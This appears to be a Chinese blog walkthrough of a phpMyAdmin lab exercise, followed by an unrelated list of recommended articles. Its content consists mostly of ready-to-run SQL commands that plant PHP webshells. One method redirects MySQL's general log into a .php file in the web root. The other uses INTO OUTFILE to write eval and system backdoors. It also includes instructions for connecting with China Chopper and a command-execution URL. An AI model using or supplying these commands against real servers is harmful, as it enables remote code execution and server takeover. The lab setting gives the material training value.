phpMyAdmin之CMS靶场

方法一:通过日志文件拿webshell

常用的语句如下:

复制代码
show global variables like '%general%';
set global general_log='on'; 
set global general_log_file = 'D:/phpStudy_pro/WWW/muma.php';
show global variables like '%general%';
select '<?php eval($_POST["admin"]);?>';
select+'<?php+phpinfo();+?>'
select+'<?php+//%0Aphpinfo();+?>'

查看日志目录路径

复制代码
show global variables like '%general%';

打开日志功能

复制代码
set global general_log='on'; 

设置日志文件目录,创建php日志文件

复制代码
set global general_log_file='D:/phpStudy_pro/WWW/muma.php';

查看自己创建的日志文件

复制代码
show global variables like '%general%';

往日志文件里写一句话木马

复制代码
select '<?php eval($_POST["admin"]);?>';

使用中国菜刀工具连接自己创建的php文件。

链接到了服务器的目录

懒人方法:也可以直接全部运行

复制代码
show global variables like '%general%';
set global general_log='on'; 
set global general_log_file = 'D:/phpStudy_pro/WWW/muma.php';
show global variables like '%general%';
select '<?php eval($_POST["admin"]);?>';

方法二:上传日志文件拿shell

常用语句

复制代码
1.⾸先判断mysql位置
select @@datadir
路径:C:\phpStudy\MySQL\data\
2.猜测web路径
猜测web路径:C:\phpStudy\www
C:\phpStudy\WWW\web.php
3.写webshell
select "<?php eval($_POST[a]);?>" into outfile 'c:/phpstudy/www/b.php';
select "<?php system($_GET[a]);?>" into outfile 'c:/phpstudy/PHPTutorial/w
ww/d.php';
4.浏览器
http://192.168.2.8/d.php?a=dir ..\
select "<?php phpinfo();eval($_POST[a]);?>" into outfile 'C:\phpStudy\WWW
\web.php';
备注:/
不要⽤\,如⾥要⽤\\(转义)
相关推荐
岸边的风18 分钟前
无需公网IP的文件交互:FileCodeBox容器化部署技术解析
网络·网络协议·tcp/ip
世事如云有卷舒41 分钟前
Ubunt20.04搭建GitLab服务器,并借助cpolar实现公网访问
linux·服务器·gitlab
Zonda要好好学习1 小时前
Python入门Day4
java·网络·python
Little-Hu1 小时前
QML TextEdit组件
java·服务器·数据库
riverz12271 小时前
TCP backlog工作机制
服务器·网络·tcp/ip
2401_858286112 小时前
OS15.【Linux】gdb调试器的简单使用
linux·运维·服务器·开发语言·gdb
yqcoder2 小时前
1. http 有哪些版本,你是用的哪个版本,怎么查看
网络·网络协议·http
c30%003 小时前
内网渗透——红日靶场五
运维·服务器
宇钶宇夕4 小时前
EPLAN 电气制图:建立自己的部件库,添加部件-加SQL Server安装教程(三)上
运维·服务器·数据库·程序人生·自动化
运维小贺5 小时前
各服务器厂商调整BIOS睿频教程
linux·运维·服务器·性能优化